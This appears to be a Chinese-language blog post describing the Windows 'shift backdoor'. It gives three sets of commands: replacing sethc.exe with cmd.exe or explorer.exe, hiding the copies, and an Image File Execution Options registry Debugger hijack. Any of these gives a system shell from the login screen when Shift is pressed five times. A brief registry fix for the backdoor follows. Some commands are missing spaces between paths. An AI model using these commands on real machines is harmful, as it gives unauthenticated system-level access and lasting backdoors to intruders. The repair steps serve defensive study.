参考:https://blog.csdn.net/qq_43626025/article/details/122031653
shift后门
替换C:\windows\system32\sethc.exe为你想要启动的后门程序,这里替换为我们用最常见的cmd.exe。
这里要注意下,默认情况下我们需要先改变sethc的所有者,然后修改用户权限不然的话没办法操作。
执行以下命令
Move C:\windows\system32\sethc.exeC:\windows\system32\sethc.exe.bak
Copy C:\windows\system32\cmd.exeC:\windows\system32\sethc.exe
然后回到系统登录界面,连续按5次shift,调用cmd
一、如何制作shift后门
方法1
在cmd窗口,敲打命令如下:
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
用copy命令将explorer.exe复制为setch.exe,这样在登陆界面下连续按5次shift就可以调出程序管理系统了,就获取了系统权限。
(也可以将explorer.exe 改为cmd.exe,这样子这样在登陆界面下连续按5次shift就可以调出cmd命令了,就获取了shell权限。)
方法2
将 C:\WINDOWS\system32\dllcache\sethc.exe删除,这个文件夹中放着缓存,如果不删除就会自动变回去
找到 C:\WINDOWS\system32\cmd.exe 将其复制并将名称更改为 sethc.exe,放回文件夹中
方法3
REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”
命令说明:reg add 是向注册表添加记录,后面跟的是注册表的位置,这里需要注意的是 HKLM 实际上是 HKEY_LOCAL_MACHINE 的缩写。Image File Execution Option 这个目录就是用来设置镜像劫持的,要被劫持的就是命令中的 sethc 粘滞键程序,随后通过 / v 来指定键名,这个键名 debugger 是固定的,然后通过 / t 来指定类型,即 REG_SZ 字符串类型,最后通过 / d 来指定键的值,即被恶意替换的程序,也就是我们的 cmd
修复方法
1,运行“regedit”打开注册表
2,切换该位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
如果该目录下不存在sethc.exe项:
对着Image File Execution 右键 新建项 里面输入sethc.exe
对着新创建的sethc.exe右健,新建,字符串值,Debugger
双击新建的Debugger,在数值数据中填入afafagagag一些你胡乱打的数值
置完后最好设置下权限,Everyone 禁止 删除 禁止 设置项值
如果目录下存在sethc.exe项:
打开sethc.exe项 右面双击 Debugger 里面的内容改成afagagagag之类的(乱打就行),这样就免疫并且清除了 shift后门.
1506
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
